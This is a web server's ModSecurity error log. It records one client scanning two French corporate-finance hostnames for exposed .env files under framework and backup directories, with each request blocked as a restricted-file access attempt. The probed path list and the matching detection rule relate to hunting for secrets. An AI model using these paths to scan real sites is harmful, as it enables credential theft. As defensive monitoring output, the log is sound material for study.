[Mon May 11 16:26:34.968835 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:40820] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/react/.env"] [unique_id "agHnGlV4kyjgo4bQBUhUaQAAANA"]
[Mon May 11 16:26:35.675259 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:40826] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/nest/.env"] [unique_id "agHnG_y_GXSWIKeli0vycgAAAIQ"]
[Mon May 11 16:26:35.675482 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:40826] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/nest/.env"] [unique_id "agHnG_y_GXSWIKeli0vycgAAAIQ"]
[Mon May 11 16:26:35.675957 2026] [core:error] [pid 1411201:tid 1411250] [client 18.180.54.2:40826] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:35.676106 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:40826] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/nest/.env"] [unique_id "agHnG_y_GXSWIKeli0vycgAAAIQ"]
[Mon May 11 16:26:35.678969 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:40834] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/vue/.env"] [unique_id "agHnG1V4kyjgo4bQBUhUagAAAMg"]
[Mon May 11 16:26:35.679168 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:40834] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/vue/.env"] [unique_id "agHnG1V4kyjgo4bQBUhUagAAAMg"]
[Mon May 11 16:26:35.679663 2026] [core:error] [pid 1416109:tid 1416138] [client 18.180.54.2:40834] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:35.679802 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:40834] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/vue/.env"] [unique_id "agHnG1V4kyjgo4bQBUhUagAAAMg"]
[Mon May 11 16:26:36.388425 2026] [security2:error] [pid 1411055:tid 1411078] [client 18.180.54.2:40844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/react/.env"] [unique_id "agHnHEWKUxpmnkK7zHx8HwAAARU"]
[Mon May 11 16:26:36.388671 2026] [security2:error] [pid 1411055:tid 1411078] [client 18.180.54.2:40844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/react/.env"] [unique_id "agHnHEWKUxpmnkK7zHx8HwAAARU"]
[Mon May 11 16:26:36.389262 2026] [core:error] [pid 1411055:tid 1411078] [client 18.180.54.2:40844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:36.390546 2026] [security2:error] [pid 1411055:tid 1411078] [client 18.180.54.2:40844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/react/.env"] [unique_id "agHnHEWKUxpmnkK7zHx8HwAAARU"]
[Mon May 11 16:26:36.406747 2026] [security2:error] [pid 1412074:tid 1412084] [client 18.180.54.2:40836] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/angular/.env"] [unique_id "agHnHDJnyuKVXoStDha1CwAAAEg"]
[Mon May 11 16:26:36.406964 2026] [security2:error] [pid 1412074:tid 1412084] [client 18.180.54.2:40836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/angular/.env"] [unique_id "agHnHDJnyuKVXoStDha1CwAAAEg"]
[Mon May 11 16:26:36.407438 2026] [core:error] [pid 1412074:tid 1412084] [client 18.180.54.2:40836] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:36.408405 2026] [security2:error] [pid 1412074:tid 1412084] [client 18.180.54.2:40836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/angular/.env"] [unique_id "agHnHDJnyuKVXoStDha1CwAAAEg"]
[Mon May 11 16:26:37.073376 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:40860] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/vue/.env"] [unique_id "agHnHVV4kyjgo4bQBUhUawAAAMk"]
[Mon May 11 16:26:37.073612 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:40860] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/vue/.env"] [unique_id "agHnHVV4kyjgo4bQBUhUawAAAMk"]
[Mon May 11 16:26:37.074169 2026] [core:error] [pid 1416109:tid 1416139] [client 18.180.54.2:40860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:37.074366 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:40860] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/vue/.env"] [unique_id "agHnHVV4kyjgo4bQBUhUawAAAMk"]
[Mon May 11 16:26:37.103863 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:40862] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/svelte/.env"] [unique_id "agHnHTJnyuKVXoStDha1DgAAAEk"]
[Mon May 11 16:26:37.104081 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:40862] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/svelte/.env"] [unique_id "agHnHTJnyuKVXoStDha1DgAAAEk"]
[Mon May 11 16:26:37.104559 2026] [core:error] [pid 1412074:tid 1412085] [client 18.180.54.2:40862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:37.104725 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:40862] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/svelte/.env"] [unique_id "agHnHTJnyuKVXoStDha1DgAAAEk"]
[Mon May 11 16:26:37.755870 2026] [security2:error] [pid 1411099:tid 1411112] [client 18.180.54.2:40870] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/angular/.env"] [unique_id "agHnHQ-Qm4vhlWBPlMi6NAAAAAw"]
[Mon May 11 16:26:37.756114 2026] [security2:error] [pid 1411099:tid 1411112] [client 18.180.54.2:40870] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/angular/.env"] [unique_id "agHnHQ-Qm4vhlWBPlMi6NAAAAAw"]
[Mon May 11 16:26:37.756644 2026] [core:error] [pid 1411099:tid 1411112] [client 18.180.54.2:40870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:37.758461 2026] [security2:error] [pid 1411099:tid 1411112] [client 18.180.54.2:40870] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/angular/.env"] [unique_id "agHnHQ-Qm4vhlWBPlMi6NAAAAAw"]
[Mon May 11 16:26:37.788406 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:40876] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/vite/.env"] [unique_id "agHnHfy_GXSWIKeli0vydAAAAIw"]
[Mon May 11 16:26:37.788643 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:40876] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/vite/.env"] [unique_id "agHnHfy_GXSWIKeli0vydAAAAIw"]
[Mon May 11 16:26:37.789180 2026] [core:error] [pid 1411201:tid 1411258] [client 18.180.54.2:40876] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:37.789346 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:40876] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/vite/.env"] [unique_id "agHnHfy_GXSWIKeli0vydAAAAIw"]
[Mon May 11 16:26:38.453385 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:40884] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/svelte/.env"] [unique_id "agHnHkWKUxpmnkK7zHx8IQAAAQM"]
[Mon May 11 16:26:38.453632 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:40884] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/svelte/.env"] [unique_id "agHnHkWKUxpmnkK7zHx8IQAAAQM"]
[Mon May 11 16:26:38.454445 2026] [core:error] [pid 1411055:tid 1411060] [client 18.180.54.2:40884] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:38.454667 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:40884] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/svelte/.env"] [unique_id "agHnHkWKUxpmnkK7zHx8IQAAAQM"]
[Mon May 11 16:26:38.474020 2026] [security2:error] [pid 1411099:tid 1411292] [client 18.180.54.2:39476] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/backup/.env"] [unique_id "agHnHg-Qm4vhlWBPlMi6NQAAAAg"]
[Mon May 11 16:26:38.474216 2026] [security2:error] [pid 1411099:tid 1411292] [client 18.180.54.2:39476] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/backup/.env"] [unique_id "agHnHg-Qm4vhlWBPlMi6NQAAAAg"]
[Mon May 11 16:26:38.474686 2026] [core:error] [pid 1411099:tid 1411292] [client 18.180.54.2:39476] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:38.474833 2026] [security2:error] [pid 1411099:tid 1411292] [client 18.180.54.2:39476] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/backup/.env"] [unique_id "agHnHg-Qm4vhlWBPlMi6NQAAAAg"]
[Mon May 11 16:26:39.140646 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:39482] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/vite/.env"] [unique_id "agHnHzJnyuKVXoStDha1GwAAAFM"]
[Mon May 11 16:26:39.140882 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:39482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/vite/.env"] [unique_id "agHnHzJnyuKVXoStDha1GwAAAFM"]
[Mon May 11 16:26:39.141457 2026] [core:error] [pid 1412074:tid 1412095] [client 18.180.54.2:39482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:39.141642 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:39482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/vite/.env"] [unique_id "agHnHzJnyuKVXoStDha1GwAAAFM"]
[Mon May 11 16:26:39.192524 2026] [security2:error] [pid 1411055:tid 1411065] [client 18.180.54.2:39488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/backups/.env"] [unique_id "agHnH0WKUxpmnkK7zHx8IwAAAQg"]
